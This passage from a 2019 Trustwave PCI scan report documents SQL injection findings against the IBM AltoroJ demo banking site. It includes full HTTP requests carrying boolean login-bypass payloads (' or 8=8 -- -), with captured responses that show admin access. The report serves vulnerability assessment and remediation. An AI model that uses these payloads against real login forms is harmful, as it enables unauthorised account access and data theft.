passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 234 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 235 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 236 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10"
>http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 237 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

17 SQL Injection Vulnerability 7.5 High Fail URL: http://demo.testfire.net/doLogin


Port: tcp/80

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 238 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:34:43 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 239 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 240 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

<table cellspacing="0" width="100%">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 241 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="
/bank/stocks.jsp">Trade Stocks</a></li>-->

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"


>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

</ul>
</span>

</td>
<!-- MEMBER TOC END -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 242 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.
</p>

<form name="details" method="get" action="


showAccount">
<table border="0">
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>
<option value="4485983356242217" >4485983356242217 Credit

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 243 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Card</option>
<option value="800008" >800008 Savings</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 244 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 245 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:34:43 GMT

<!-- BEGIN HEADER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 246 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 247 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 248 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- TOC BEGIN -->
<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader"


href="index.jsp?content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1"
href="index.jsp?content=personal_deposit.htm">Deposit
Product</a></li>
<li><a id="MenuHyperLink2"
href="index.jsp?content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3"
href="index.jsp?content=personal_loans.htm">Loan
Products</a></li>
<li><a id="MenuHyperLink4"
href="index.jsp?content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 249 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 250 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 251 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 252 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 253 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10"
>http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 254 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

18 SQL Injection Vulnerability 7.5 High Fail URL: http://65.61.137.117/doLogin


Port: tcp/80

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 255 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:28:56 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 256 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
